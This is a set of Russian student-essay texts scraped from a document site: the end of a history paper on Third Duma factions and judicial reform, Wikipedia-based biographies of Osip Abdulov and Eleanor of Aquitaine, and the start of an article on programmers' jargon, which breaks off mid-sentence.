Свобода личности, гарантированность прав и свобод человека и гражданина и взаимная ответственность гражданина и государства были альфой и омегой правосознания либералов. В реализации этого принципа был, по их мнению, главный смысл судебной реформы. Поэтому в процессе обсуждения всех законопроектов соблюдение его всегда выдвигалось кадетами и их союзниками на первый план. Именно они выступили основными инициаторами поправок, принятых Думой, предоставлявших дополнительные процессуальные гарантии потерпевшим от действий административной власти. Именно эти фракции, полагая, что социальные причины преступности играют главную роль, выступили за расширение возможности для применения более гуманных мер наказания. Именно с их подачи и при их активном содействии были переработаны статьи законопроекта о местном суде, касавшиеся установления дополнительных гарантий для реализации принципа неприкосновенности личности.
Таким образом, деятельность леволиберальных фракций Думы в процессе дебатирования законопроектов судебной реформы была направлена на создание реальных гарантий: для соблюдения принципа разделения властей, независимого судебного контроля над администрацией; усиления роли и полномочий органов местного самоуправления как институтов гражданского общества; верховенства права; равенства всех перед законом. Кадеты и их союзники выступали безусловными и наиболее последовательными сторонниками правовой модернизации России и реализации в ней идеи правового государства. В этом они резко отличались от правых, которые выступали категорически против идеи правового государства в её европейском понимании; от октябристов, которые использовали её в пропагандистских целях для укрепления доверия общества к власти, и от левых фракций, которые выступали с позиции неверия в возможность содействовать его построению легальными, правовыми путями. Левые либералы делали основной акцент на необходимость приспособления нового суда, судопроизводства и права к социально-экономическим требованиям нового индустриального общества, к тем изменениям в социальной и экономической жизни деревни и, в целом, российского «почвеннического» уклада, которые влечёт за собой появление частной собственности и рыночной экономики. Леволиберальные фракции полагали необходимым проведение юридической модернизации более решительно и последовательно, нежели думский центр, не делая в ходе её проведения резких различий между российской деревней и городом, окраинами России и её «сердцевиной». Понимая, что правовое «воспитание» российской «почвы» неизбежно, они видели её в радикальном переустройстве судебно-правовой системы России, организации последовательного поглощения её «цивилизацией». Однако степень адекватности такой позиции по отношению к российским реалиям (что вытекает из того, что основанные на их основополагающих политико-правовых принципах поправки к законопроектам не были в большинстве своём приняты и тем более реализованы) вызывает, конечно же, определённые сомнения.
Социалистические фракции Думы, к числу которых необходимо отнести трудовиков и социал-демократов, также являлись сторонниками идеи народного суверенитета. Однако в отличие от либералов либо вообще не признавали компромисса с «исторически сложившейся властью» и постепенности в процессе реализации этого постулата (социал-демократы), либо являлись эволюционистами в крайне незначительной степени (трудовики). Сам этот постулат воспринимался ими как непререкаемая догма. Исходя из этого принцип разделения властей трактовался ими как прогрессивный, но ни в коем случае не как политический идеал (даже на данном историческом этапе). Таковым для социалистов выступало «самодержавие народа» в форме «идеальной» парламентской республики с однопалатным парламентом, воплощавшим «истинную», «бесклассовую» демократию, не нуждавшуюся в поиске баланса классовых интересов, а потому базировавшуюся на идее «единства власти народных представителей». По их мнению, выборность всех чиновников и судей «сверху до низу» и принцип неограниченной их ответственности перед представительными органами власти решал все проблемы. Существовавшее в России государство они считали орудием в руках господствующего класса, применяемым (исключительно – по мнению и социал-демократов и преимущественно – трудовиков) в целях организации эксплуатации угнетённых классов и их подавления. По их мнению, таковая природа современного государства полностью исключала возможность реализации их идеала легальным путём – путём парламентской борьбы. Поэтому их парламентская деятельность, в основном, носила пропагандистский характер и была направлена на пробуждение «движения низов», которое насильственным путём сметёт современный «антинародный» политический порядок, т.е. на критику существующего режима. Впрочем, необходимо заметить, что трудовики в отличие от социал-демократов осуществляли эту критику с более или менее позитивных позиций, предлагая многочисленные поправки к законопроектам судебной реформы, пытаясь убедить в их необходимости леволиберальные, а иногда и господствующие фракции Думы. Социал-демократическая фракция выступала с более непримиримых позиций и, руководствуясь необходимостью проявлять демонстративный остракизм по отношению к «прогнившей» власти, голосовала против законопроектов целиком либо вносила поправки, носящие чисто пропагандистский характер, в отвержении которых Думой она не сомневалась, и не считала нужным это скрывать.
В отношении необходимости формирования в России основ гражданского общества обе социалистических фракции Думы придерживались точки зрения, что таковое должно было, конечно же, подчинить себе государство (отсюда, в частности – требование отменить любые имущественные цензы, касающиеся формирования судебного аппарата империи). Однако представлять собой, по их мнению, оно должно было в сущности корпорации с прямой демократией (территориально) – сельские («крестьянские общины»), на которые ориентировались трудовики, и производственные, которым отдавали предпочтение социал-демократы. Это сближало представителей, защищавших корпоративные интересы крестьянства, трудовиков, с правыми крестьянскими депутатами (до такой степени, что некоторые их поправки взаимно поддерживались). Трудовики более оптимистично, чем социал-демократы были настроены по отношению к возможности влияния общества на эволюцию государственности в общем и судебно-правовой системы в частности в сторону демократизации. Поэтому, полагая, что развитие общественной инициативы, в конце концов, способно изменить карательную направленность «классового судопроизводства», выступали: за развитие патронатного движения и ювенальной юстиции, расширение компетенции суда присяжных и прочих институтов формирующегося гражданского общества. Социал-демократы же, будучи ярыми антиэволюционистами, абсолютизировали классовый характер государства и права. В силу этого, с их точки зрения, пока они не в их руках, руках пролетариата и беднейшего крестьянства, необходим остракизм по отношению к ним. Поэтому они выступали против улучшения законопроектов и в части усиления влияния гражданского общества на политическую власть.
Для социалистов (так же как и для правых) был характерен взгляд на право, как на инструмент, обслуживающий классовые и идеологические интересы государства. Трудовики и социал-демократы вследствие этого выступали с резко враждебных позиций по отношению к существовавшему правовому устройству и, в сущности, к принципу верховенства права вообще. Поэтому в качестве поправок к законопроектам фигурировали правовые нормы, имеющие зачастую весьма отдалённое отношение к правовой системе Российского государства, выражавшему, с их точки зрения, преимущественно интересы господствующих классов. Поэтому ораторы от социалистов зачастую грешили правовым нигилизмом и волюнтаризмом.
В принципе, социалистические фракции, декларирующие своей целью самую широкую демократизацию российской политико-правовой системы, были безусловными сторонниками принципа равенства всех перед законом. Однако необходимо отметить, что они с большим недоверием относились к социальным слоям, враждебным тому корпоративному устройству, на которое они опирались в своих социальных проектах. Поэтому они старались ограничить или, по крайней мере, минимизировать их влияние на судебно-правовую систему России, настаивая, например, на необходимости обеспечить большинство в местном суде представителям традиционалистского крестьянства и уменьшить влияние на судопроизводство дворянства, предпринимательских слоёв населения и связанной с ними интеллигенции.
Свобода личности, гарантированность прав и свобод человека и гражданина и взаимная ответственность гражданина и государства, в принципе, признавалась и всячески превозносилась ораторами от социалистов. Однако остракизм по отношению к правящему режиму, сугубо «антипозитивная» позиция, занятая по отношению к законопроектам, которые должны были оформить судебную реформу, превалирование пропагандистской составляющей их думской деятельности, приводили или к нежеланию поправками улучшать содержание законодательных предложений, вносимых правительством и господствующими фракциями, или к внесению таких поправок, которые сводились к предоставлению «избыточных» и утопичных гарантий для личности, направленных к явному ущербу для современной им «антинародной» государственной власти, рассчитанных, в основном, на пропагандистский эффект, который мог «разбудить народные массы» для борьбы со «старыми и прогнившими» политико-правовыми порядками.
Таким образом, позиция социалистических фракций по отношению к законопроекту базировалась на полном и абсолютном недоверии к современному им Российскому государству в силу его классовой природы, которое вряд ли может быть признано оправданным. Это привело к нежеланию признавать общие закономерности политико-правового развития, своеобразие политико-правового элемента цивилизационной составляющей России, а в итоге – к вытекающему из политического максимализма правовому нигилизму и волюнтаризму. Эта позиция, в свою очередь, приводила их к отрицанию возможности борьбы с нарушениями законности в рамках существующей политической системы. Следствием этого явилось стремление к подрыву всеми возможными способами основ существующего политического режима как основной цели своей законотворческой деятельности. Социалисты, таким образом, выступали сторонниками необходимости модернизации судебно-правовой системы России, но, в значительной мере, с опорой на адаптированные для индустриальной цивилизации «почвеннические устои». Позицию крайних левых фракций, с одной стороны, выступавших за радикальную демократизацию и «юридизацию» судебных институтов империи, а с другой – за сохранение влияния корпоративного элемента на судоустройство, судопроизводство и даже в некоторой степени «мировоззрение» юстиции, нельзя не охарактеризовать как «двойственную».
Таким образом, можно сделать общий вывод о том, что позиция, занятая основными группировками и фракциями российского парламента третьего созыва по отношению к основным положениям проектировавшейся правительством судебной реформы, была связана с отношением к такому основополагающему модернизационному политико-правовому институту, как правовое государство. Эта позиция, в свою очередь, в значительной степени определялась их цивилизационными предпочтениями и ориентациями. Их анализ позволяет выразить мнение о достаточной проблематичности реализации принципов правового государства на практике в силу того, что, пожалуй, лишь леволиберальные фракции Думы поддерживали его в полной мере. Всё это, конечно, не может не порождать сомнения в адекватности режима третьеиюньской монархии требованиям времени. Очевидно, что затруднения в процессе модернизации в немалой степени были обусловлены отсутствием не только должной гибкости монарха и правительства, но и достаточно мощной социальной базы для её проведения.
БИБЛИОГРАФИЧЕСКИЙ СПИСОК
Аврех А.Я. П.А. Столыпин и судьбы реформ в России. М.: Политиздат, 2009. 286 с.
Дмитриев Ю.А., Черкашин Е.Ю. Законодательные органы России от Новгородского веча до Федерального Собрания (сложный путь от патриархальной традиции к цивилизации) / ред. Е.Ф. Варварина. М.: Манускрипт, 2008. 103 с.
Законотворчество в Российской Федерации: науч.-практич. и учеб. пособие / под ред. А.С. Пиголкина; Ин-т законодательства и сравнит. правоведения при Правительстве Рос. Федерации. М.: Формула права, 2010. 605 с.
Ильин В.В. Реформы и контрреформы в России: Циклы модернизацион. процесса / ред. В.В. Ильин. М.: Изд-во Моск. ун-та, 2006. 399 с.
История парламентаризма в государствах-участниках Содружества Независимых Государств: из материалов науч.-практич. конф.: (к 90-летию со дня нач. работы Гос. Думы России) / Федер. Собр. парламент РФ Гос. Дума. Изд. Гос. Думы. М.: Известия, 2008. 47 с.
История политических партий России: учебник для студентов вузов, обучающихся по спец. «История» / под ред. А.И. Зевелева. М.: Высш. шк., 2009. 447 с.
История русской правовой мысли: Биогр. Док. Публ. М.: Остожье, 2008. 604 с.
Казарезов В.В. О Петре Аркадьевиче Столыпине / В.В. Казарезов. М. : Агропромиздат, 2007. 94 с.
Казарезов В.В. П.А. Столыпин: история и современность. / В.В. Казарезов. Новосибирск: МП РИД, 2007. 107 с.
Козбаненко В.А. Государственная Дума как опыт представительной демократии в России: Краткий очерк истории / ред. А.С. Беляев; О-во Знание России; Ростов. обл. орг. Ростов н/Д.: Юго-Запад, 2009. 46 с.
Комиссарова Л.И., Яренгина В.П. Органы высшей государственной власти и центрального управления Российской империи в конце XIX-начале XX веков: справ. изд. / Л.И. Комиссарова, В.П. Яренгина СПб., 2008. 82 с.
Конституционализм: исторический путь России к либеральной демократии / сост. А.В. Гоголевский, Б.Н. Ковалев; Ин-т Открытое о-во. М.: Гардарики, 2010. 617 с.
Кудинов О.А. Конституционные реформы в России в XIX – начале XX вв. / Ин-т молодёжи М.: Социум, 2008. 131 с.
Лихобабин В.А., Пархоменко А.Г. Российский конституционализм: История. Современность. Перспективы / В.А. Лихобабин М.: Молодая гвардия, 2007.
Народовластие в России – очерк истории и современного состояния / ред. Ю.А. Дмитриев. М.: Манускрипт, 2007. 296 с.
П.А. Столыпин и исторический опыт реформ в России / отв. ред. А.П. Толочко. Омск: Изд-полигр. отд. Омск. гос. ун-та, 2007. 201 с.
Шестаков Ю.А. Участие фракции партии народной свободы в обсуждении законопроекта об изменении порядка производства дел о преступных деяниях по службе в Третьей Государственной думе. Человек и общество на рубеже тысячелетий: междунар. сб. науч. тр. / под общ. ред. проф. О.И. Кирикова. Вып. 46. Воронеж: Воронежский госпедуниверситет, 2010. С. 257–265.
Шестаков Ю.А. Участие «Польского коло» III Государственной Думы в обсуждении законопроекта об изменении порядка производства дел о преступных деяниях по службе. Социально-гуманитарные проблемы современности: сб. науч. тр. / редкол.: Н.И. Гусев. Шахты: ГОУ ВПО «ЮРГУЭС», 2010. С. 63–64.
П.А. Столыпин: Жизнь за Отечество: Жизнеописание (1862–1911). / Г.П. Сидоровнин. М.: Поколение, 2007. 720 с.: ил.
Семенникова Л.И. Россия в мировом сообществе цивилизаций: учебник для вузов по курсу «Отечественная история». 6-изд., перераб. М.: КДУ, 2008. 752 с.
Становление российского парламентаризма начала XX века / Н.Б. Селунская, Л.И. Бородкин, Ю.Г. Григорьева, А.Н. Петров; под ред. Н.Б. Селунской. М.: Мосгорархив, 1996.
Шестаков Ю.А. Обсуждение законопроекта об условно-досрочном освобождении в III Государственной Думе. Человек и общество на рубеже тысячелетий: междунар. сб. науч. тр. / под общ. ред. проф. О.И. Кирикова. Вып. 42. Воронеж: Воронежский госпедуниверситет, 2008. 427 с. С. 150–158.
Шестаков Ю.А. Обсуждение законопроекта о введении состязательного начала в обряд предания суду в Третьей Государственной думе. Актуальные проблемы гуманитарных наук. Всеросс. Науч.-практич. конф. 8–9-апреля 2009 г. г. Шахты: в 2 т. / Шахты: ГОУ ВПО «ЮРГУЭС», 2009. Т 2. С. 289–291.
Шестаков Ю.А. Рассмотрение законопроекта об изменении порядка производства дел о взыскании вознаграждения за вред и убытки, причинённые распоряжениями должностных лиц в III Государственной Думе. Социально-гуманитарные проблемы современности: сб. науч. трудов / редкол.: Н.И. Гусев. Шахты: ГОУ ВПО «ЮРГУЭС», 2010. С. 59–60.
Шестаков Ю.А. Участие правых фракций III Государственной Думы в обсуждении законопроекта об изменении порядка производства дел о преступных деяниях по службе. Социально-гуманитарные проблемы современности: сб. науч. тр. / редкол.: Н.И. Гусев. Шахты: ГОУ ВПО «ЮРГУЭС», 2010. С. 61–62.
Правда Столыпина: Альманах 1 / Г. Сидоровнин. Саратов: Соотечественник, 2009. 318 с.
Овсепян Ж.И. Становление парламента в России / отв. ред. Д.Ю. Шапсугов. Ростов н/Д.: Изд-во СКАГС, 2008. |
https://doc4web.ru/istoriya/abdulov-osip-naumovich.html | Абдулов, Осип Наумович | https://doc4web.ru/uploads/files/159/6a2597d8edc7a4cfceae48b3978e096d.docx | files/6a2597d8edc7a4cfceae48b3978e096d.docx | План
Введение
1 Биография
2 Признание и награды
3 Творчество
3.1 Роли в театре
3.2 Роли в кино
Список литературы
Введение
О́сип Нау́мович Абду́лов (3 (16) ноября 1900 — 14 июня 1953) — советский актёр театра и кино, режиссёр, Народный артист РСФСР (1944)[1][2]. Лауреат Сталинской премии второй степени (1951)
1. Биография
Осип Абдулов родился 3 (16) ноября 1900 года в городе Лодзь (ныне Польша) в еврейской семье[3][4]. В 1917 году поступил на юридический факультет Московского университета.
Сценическую деятельность начал с 1918 года в студии имени Шаляпина (до 1923 года), где сыграл свою первую значительную роль — бродягу Грена в «Зеленом попугае» А. Шницлера (1919), затем выступал в Театре им. Комиссаржевской (1924—1925), МХТ (1925—1926), Театре сатиры (1926—1927), в Профклубной мастерской (1928), Театре-студии под руководством Юрия Завадского (1929—1936), Театре им. Вс. Мейерхольда, Московском театре Революции (1938—1942), а в 1943 году пришёл в труппу театра имени Моссовета[2].
С 1924 года Осип Абдулов работал на радио сначала в качестве актёра, а затем и как режиссёр, поставил более 200 радиоспектаклей, в том числе «Кола Брюньон» Р. Роллана, «Тартарен из Тараскона» А. Доде, «Пиквикский клуб» Ч. Диккенса, «Шинель» Н. Гоголя, «Мальва» и «Макар Чудра» М. Горького и многие другие. Организовал художественное вещание для детей.
С 1933 года снимался в кино. Лучшие его роли — Джон Сильвер в «Острове сокровищ» (1937), Тарантулов в «Человеке в футляре», грек Дымба из «Свадьбы», Крашке в «Поединке». Снялся он также в популярных фильмах «Светлый путь», «Свинарка и пастух», «Пятнадцатилетний капитан».
С 1929 года занимался педагогической деятельностью в Театре-студии Ю.Завадского, затем в ГИТИСе. Близким другом О. Н. Абдулова был актёр и режиссёр Московского ГОСЕТа Соломон Михоэлс[5].
Жена — актриса Елизавета Метельская.
Сын — актёр Всеволод Осипович Абдулов. Отец и сын похоронены на Введенском кладбище в Москве.
2. Признание и награды
Народный артист РСФСР (1944)
Сталинская премия второй степени (1951) — за исполнение роли академика Рыжова в спектакле «Рассвет над Москвой» А. А. Сурова
орден Трудового Красного Знамени (1949)
3. Творчество
3.1. Роли в театре
1928 — «На всякого мудреца довольно простоты» А. Н. Островского — Крутицкий
1933 — «Ученик дьявола» Б. Шоу — Бургойнь
1934 — «Волки и овцы» А. Н. Островского — Лыняев
1936 — «Школа неплательщиков» Л. Вернея — Фромантейль
1940 — «Бесприданница» А. Н. Островского — Кнуров
1945 — «Чайка» А. П. Чехова — Сорин
1946 — «Госпожа министерша» Б. Нушича — дядя Вася
«Без вины виноватые» А. Н. Островского — Шмага
1950 — «Рассвет над Москвой» А. А. Сурова — академик Рыжов
1953 — «Рассказ о Турции» Назыма Хикмета — Старый ашуг
3.2. Роли в кино
1936 — Последняя ночь - полковник
1936 — Зори Парижа — Вассэ младший
1937 — Остров сокровищ — Джон Сильвер
1938 — Семья Оппенгейм — Жак Лавендель
1938 — Честь — инженер
1939 — Человек в футляре — Тарантулов
1940 — Светлый путь — директор Фабрики Дорохов
1941 — Свинарка и пастух — буфетчик
1941 — Как поссорился Иван Иванович с Иваном Никифоровичем — городничий
1941 — Морской ястреб — Иван Акимович
1944 — Свадьба — грек Дымба
1944 — Поединок — Крашке, полковник гестапо
1949 — Александр Попов — Айзекс
Список литературы:
Театральная энциклопедия. / Гл. ред. С. С. Мокульский. Т. 1. — М.: Советская энциклопедия, 1961. — 1214 стб. с илл., 12 л. илл.
Большая Российская энциклопедия: В 30 т. / Председатель науч.-ред. совета Ю. С. Осипов. Отв. ред С. Л. Кравец. Т. 1. А — Анкетирование. — М.: Большая Российская энциклопедия, 2005. — 766 с.: ил.: карт.
Российская еврейская энциклопедия, т. 1, Российская академия естественных наук. — М.: Эпос, 1997.
Абдулов О. Н. Статьи и воспоминания. — М.: Искусство, 1969.
Гейзер М. Опустела без него Москва.
Источник: http://ru.wikipedia.org/wiki/Абдулов,_Осип_Наумович |
https://doc4web.ru/istoriya/alienora-akvitanskaya.html | Алиенора Аквитанская | https://doc4web.ru/uploads/files/190/f139e29f9e3460746dffaccb837c7fcc.docx | files/f139e29f9e3460746dffaccb837c7fcc.docx | План
Введение
1 Биография
2 Браки и дети
3 В культуре
4 Библиография
Введение
Алиенора (Элеонора, Альенора) Аквитанская (фр. Aliénor d'Aquitaine, а также фр. Éléonore de Guyenne, ок. 1122 — 31 марта 1204, Фонтевро) — герцогиня Аквитании и Гаскони (1137—1204), внучка первого трубадура Прованса Гильома IX Аквитанского, графиня де Пуатье (1137—1204), королева Франции (1137—1152), супруга французского короля Людовика VII, королева Англии (1154—1189), одна из богатейших и наиболее влиятельных женщин Европы Высокого средневековья. Женщина удивительной красоты, Алиенора была музой французского поэта-трубадура Бернарда де Вентадорна, ей он посвятил ряд своих кансон.
Родители:
Вильгельм X (1099—1137), герцог Аквитании
Аенор де Шательро (1103—1130)
1. Биография
Родители — Вильгельм X (1099—1137), герцог Аквитании, и Аенор де Шательро (1103—1130).
В 15 лет — после смерти своего отца и брата, — Алиенора оказалась владетельницей герцогства Аквитания, занимавшего обширные территории на юго-западе Франции. Южные районы страны, вследствие сохранившегося античного наследия, были и богаче, и культурнее севера королевства. В XI в. здесь возникла культура трубадуров, и сама Алиенора и ее красота не раз были воспеты в их стихах. По описаниям современников и имеющимся изображениям, она была невысокой, стройной, с удлиненным лицом, большими темными глазами и густыми медно-рыжими волосами, из-за которых трубадуры выводили ее имя от слов aigle en or — «золотая орлица».
Согласно завещанию отца Алиеноры король Франции, Людовик VI по прозвищу «Толстый», назначался ее опекуном до тех пор, пока она не выйдет замуж. Король очень быстро подобрал жениха — своего сына и наследника, тоже Людовика. 25 июля 1137 года в Бордо состоялась свадьба, и молодожены отправились в Париж, по прибытии в который узнали о смерти Людовика VI, — Элеонора стала королевой Франции.
В 1145 году Алиенора родила королю дочь, а в 1147 году вместе с ним отправилась во II крестовый поход, проделав верхом путь через Европу, Византию и захваченную турками-сельджуками Малую Азию. Людовик VII не добился военных успехов на Святой Земле, и королевская чета вернулась во Францию. В 1151 году у них родилась вторая дочь. Однако, на следующий год, 21 марта, они развелись, формальной причиной развода было объявлено то, что они находились в дальнем родстве. Дочери остались с королем, а за Алиенорой были сохранены все ее земли в Аквитании.
После расторжения брака с Людовиком Алиенора 18 мая 1152 года вышла замуж за графа Генриха Анжуйского, который 25 октября 1154 года стал королём Англии — Генрихом II Плантагенетом. Обширные аквитанские земли — её приданое, — раза в четыре превышавшие владения Капетингов, стали английскими. По мнению ряда учёных, именно в истории супружества Алиеноры Аквитанской следует искать истоки войны, получившей в XIX в. название Столетней. От первого брака у Алиеноры Аквитанской было две дочери, от второго — пять сыновей, среди которых — король-рыцарь Ричард Львиное Сердце. Поддерживая притязания старших сыновей, Алиенора вместе с ними подняла мятеж в Пуату против Генриха II. Усобица длилась около двух лет. Верх взял Генрих, Алиенора попала в плен и провела последующие 16 лет в заточении. В 1189 году Ричард вернул матери свободу. Алиенора уехала во Францию и провела последние годы жизни в бенедиктинском аббатстве Фонтевро, где и скончалась в возрасте 82 лет, пережив восьмерых из десяти своих детей.
Среди историков Алиенору Аквитанскую часто принято называть бабушкой средневековой Европы.
2. Браки и дети
Людовик VII Молодой (1120—1180) (с 25 июля 1137, Бордо — брак аннулирован 21 марта 1152)
Мария Французская (1145—1198), в 1190—1197 регентша графства Шампань.; муж: (с 1164) Генрих I Щедрый, граф Шампани и Труа.
Алиса Французская (1151—1195); муж: Тибо V Добрый, граф Блуа и Шартра.
Генрих II Плантагенет (1133—1189) (с 18 мая 1152, Пуатье, Франция)
Вильям (1152—1156)
Генрих Молодой Король (1155—1183)
Матильда (1156—1189); муж: Генрих Лев, герцог Саксонии и Баварии
Ричард I (IV) Львиное Сердце (1157—1199; жена: Беренгария Наваррская (1165/1170 — 23 декабря 1230)
Готфрид II (1158—1186)
Элеонора Английская (1162—1214); муж: Альфонсо VIII Кастильский
Иоанна Английская (1165—1199)
Иоанн I Безземельный (1167—1216)
3. В культуре
Джеймс Голдман. Пьеса «Лев зимой», экранизированная дважды — (фильм 1968 года: королеву играла Кэтрин Хэпберн, и фильм 2003 года: королеву играла Гленн Клоуз. Пьеса посвящена взаимоотношениям Алиеноры с Генрихом в последние годы его жизни и её взрослыми сыновьями.
Кинофильм «Робин Гуд» (2010 год), режиссёр Ридли Скотт, в роли королевы-матери Алиеноры — Эйлин Аткинс
Артюр Дюмон. «Аквитанская львица». М., 2008. ISBN 978-5-8189-1498-5. Роман о жизни Алиеноры до развода с Людовиком.
Добиаш-Рожденственская О. А. «Крестом и мечом. Приключения Ричарда I Львиное Сердце». М., 1991
Мартьянов А. Л. Историко-фантастический цикл «Вестники времен», изд. АСТ и «Лениздат», 1999—2005, Алиенора выведена в романах мудрой и дальновидной правительницей.
Фейхтвангер Лион. Испанская баллада.
4. Библиография
Режин Перну Алиенора Аквитанская / Пер. с франц. Васильковой А.С.. — СПб.: Издательская группа «Евразия», 2001. — 336 с. — 3000 экз. — ISBN 5-8071-0073-5
Жизнеописания трубадуров. М., 1993
Источник: http://ru.wikipedia.org/wiki/Алиенора_Аквитанская |
https://doc4web.ru/informatika/yazik-obscheniya-kompyuterschikov-potrebnost-v-affiliacii-ili-ne.html | Язык общения компьютерщиков: потребность в аффилиации или нечто большее? | https://doc4web.ru/uploads/files/185/b5dfaa051a5036958e2ebf0e38292680.docx | files/b5dfaa051a5036958e2ebf0e38292680.docx | Язык общения компьютерщиков: потребность в аффилиации или нечто большее?
Информационные технологии, появившись в качестве магического словосочетания, непонятного непосвященным, вторглись в самые различные области повседневной жизни человека. Активному воздействию подвергся язык как система и как средство коммуникации. Сегодня столкновения с современными реалиями мира компьютеров не сможет избежать даже самый "офлайновый" носитель языка. Значительное количество людей сегодня отождествляет понятие персонального компьютера с точкой доступа ко Всемирной компьютерной сети. Интернет, по утверждению А. Е. Войскунского, представляет собой уникальный полигон, на котором развертывается испытание естественного языка (Войскунский, 2001). Российский сектор Интернета характеризуется постоянным ростом числа пользователей, однако положительные сдвиги в этом направлении носят неравномерный характер. В США все чаще говорят о расколе общества на людей, имеющих доступ к Сети, и на тех, кто по разным причинам таким доступом не обладает. В России на охваченность регионов информационными технологиями влияет их удаленность от Центра и крупных городов.
Группа людей, самым непосредственным образом вовлеченная в сферу глобального эксперимента над естественным языком, - пользователи российского сектора Интернета. Самым заметным проявлением эволюционных процессов стало формирование компьютерного жаргона как особого подъязыка, первоначально призванного обслуживать профессионалов в области информационных технологий. Затем эта социальная группа приобрела диффузные очертания: жаргон используется для общения специалистов, пользователей компьютеров самого различного уровня, любителей компьютерных игр.
Представляется целесообразным выделить две важнейшие особенности, которые отличают компьютерный жаргон как подсистему языка - высокая скорость обновления арсенала жаргонизмов и незначительный пласт жаргонизмов, используемых отдельным носителем компьютерного сленга. Значительный объем выразительных средств приводит к тому, что большинство общающихся использует лишь малую их часть. Так, популярный онлайновый словарь компьютерного сленга (http://slovari.net/contents.php?sl=ej) насчитывает более 1600 лексических единиц. Естественно, таким арсеналом жаргонизмов не располагает даже компьютерщик с очень большим стажем. Как указывает О. И. Ермакова, на использование компьютерного жаргона влияют, в первую очередь, компетентность и возраст коммуникантов (Ермакова, 2001).
Жаргонизмы, составляющие ядро компьютерного сленга, - не просто более выразительные и экспрессивные аналоги терминологических оборотов. Вполне соглашаясь с этим утверждением, хотелось бы в рамках данной статьи вскрыть внутренние механизмы использования компьютерщиками жаргонизмов, которые менее заметны при поверхностном рассмотрении. Серьезные эволюционные процессы в области языка не могут не затронуть смежные сферы культуры, мышления, коммуникации.
Говоря о способах образования жаргонизмов в компьютерной сфере, О. Е. Котова указывает на интересный факт: подавляющее большинство жаргонных выражений представляют собой не новообразования, как было бы логично предположить для столь динамично развивающейся отрасли. Отнюдь: для обозначения новых реалий используются имеющиеся единицы из арсенала языка, которые сохраняют исходную форму, либо трансформируются (Котова, 2001). Наряду с аффиксацией, словосложением и аббревиацией, именно метафорический перенос и языковая игра становятся одними из самых продуктивных способов образования жаргонизмов в компьютерной сфере. Об этой тенденции можно говорить как в отношении английского, так и русского языка. Однако же в обоих языках сам характер развития этого пласта лексики приобретает и отдельные национально-специфические черты.
Современный компьютерный жаргон, по меткому выражению А. Е. Войскунского, напоминает "кириллическую латиницу" (Войскунский, 2001). "Впервые после 1920 годов русская азбука потеснена латиницей. Особенно это заметно в пересекающихся "виртуальных пространствах" - рекламном бизнесе, индустрии компьютерных игр и Интернете" (Гусейнов, 2000). Формируясь под непосредственным влиянием английского языка, русский компьютерный жаргон впитывает в себя значительную часть англоязычной терминологии в виде транскрипций и транслитераций. Вся англоязычная терминология не заимствуется компьютерным жаргоном, значительную долю составляют семантические новообразования (Ермакова, 2001). В основе таких жаргонизмов лежит вторичная номинация, которая позволяет им выполнять новую функцию. В качестве примера можно привести следующие выражения: батоны (клавиши), веник (винчестер), блохи (ошибки в программе), глаз (компьютерный монитор), бочонок (портативный компьютер - notebook). Новые слова образуются и путем намеренного искажения звуковой формы слова, в результате чего новообразования оказываются связаны ассоциативной связью со словами, образующими пласт разговорной, а порой и сниженной лексики.
Каковы же причины продуктивности такого способа номинации для русского компьютерного сленга?
С одной стороны, большинство компьютерщиков обладают высоким интеллектом и развитым чувством юмора, что находит свое отражение и в особенностях жаргонной лексики. Однако хотелось бы остановится на еще нескольких гипотезах, которые обладают объяснительным потенциалом.
Так, очевидно, что для работы с компьютером необходим высокий уровень владения английским языком. Системные сообщения, инструментарий языков программирования, техническая документация требуют знания языка международного общения. Если внимательно взглянуть на те составляющие языковой компетенции, которые необходимы специалисту в области информационных технологий, получается весьма любопытная картина: ключевыми являются рецептивные навыки, способность понять иноязычный текст. При этом совсем не обязательно знать правила чтения и произношения. Не случайно большинство работодателей ожидает от программиста знания технического английского, то есть умения понять сообщения системы и правильно на них отреагировать. В этой связи выражение "инвалид девице" (invaliddevice) может оказаться попыткой (надо признать, весьма эффектной) прочесть английскую фразу, не пользуясь соответствующими правилами. Таким образом, многие из жаргонизмов, полученных в результате фонетической трансформации исходных выражений, могут быть результатом либо незнания, либо невнимания к произносительной стороне.
Компьютер, на сегодняшний день, представляет собой устройство, доступное даже начинающему пользователю. Удобство в работе, графический пользовательский интерфейс, тем не менее, не сделали компьютер более простой машиной изнутри. Причиной активного обыгрывания английских выражений может являться стремление компьютерщиков представить заведомо сложные реалии компьютерного мира с помощью простой и обиходной лексики. На эту мысль наводит тот факт, что многие обозначения намеренно не выходят за пределы сниженно-бытового пласта лексики. Например, веревка (кабель), лапша (провода), форточки (ОС Windows), палка (джойстик). Это позволяет программистам, с одной стороны, бравировать собственной компетенцией, с другой - говорить о сложных реалиях простым языком.
Интересные лингвокультурные параллели возникают при рассмотрении понятия игры в контексте общения компьютерщиков. Компьютерные игры, учитывая их популярность и значимость для больших групп людей, можно рассматривать как самостоятельную культурную реальность. Феномен компьютерной игры требует отдельного исследования. В рамках этой статьи хотелось бы заметить, что некая предрасположенность к игре в самом широком смысле, отходу от действительности и ее моделированию характерны для большинства компьютерщиков. В своей книге "HomoLudens: Статьи по истории культуры" Йохан Хейзинга говорит о том, что сама "культура возникает в форме игры, культура первоначально разыгрывается" (Хейзинга, 1997, с . 60). Игра - не просто физиологическая реакция, она исполнена смысла (Хейзинга, 1997, с.21). Рассматривая основные признаки игры, он указывает на ее замкнутость и отграниченность от внешнего мира, сравнивая игровое пространство со священной землей. "Подобно тому, как формально отсутствует какое бы то ни было различие между игрой и священнодействием, то есть сакральное действие протекает в техже формах, что и игра, так и освященное место формально неотличимо от игрового пространства" (Хейзинга, 1997, с. 28). Игровое пространство выступает для современного человека в иных формах: это уже не храм, а киноэкран, сцена и, наконец, мир компьютера. В любом случае, мы говорим о неком замкнутом, отгороженном от остального мира пространстве, где порядок задает игра. В мире, наполненном нестабильностью, игра со своими правилами выступает как момент устойчивости, порядка. В ходе истории культуры игровой элемент все более отходит на задний план. Говоря о современности, автор указывает, что спорт, первоначально обладавший всеми признаками игры, в современном мире теряет свой игровой, состязательный характер. Если учесть, что стремление к противоборству в загадывании загадок тоже представляет собой игру, можно предположить, что языковая игра осуществляется в компьютерном жаргоне как принципиально новая форма игры. Эта игровая форма создает свое сакральное игровое пространство и привносит свои правила. Именно поэтому программистов часто рассматривают как замкнутых людей, зацикленных на реалиях мира компьютеров. Данное предположение выглядит еще более убедительным, если учесть национально-специфические особенности отношения российских программистов к труду. Западным человеком работа рассматривается как ежедневный систематический труд, при котором материальная выгода имеет приоритетное значение. Материальный 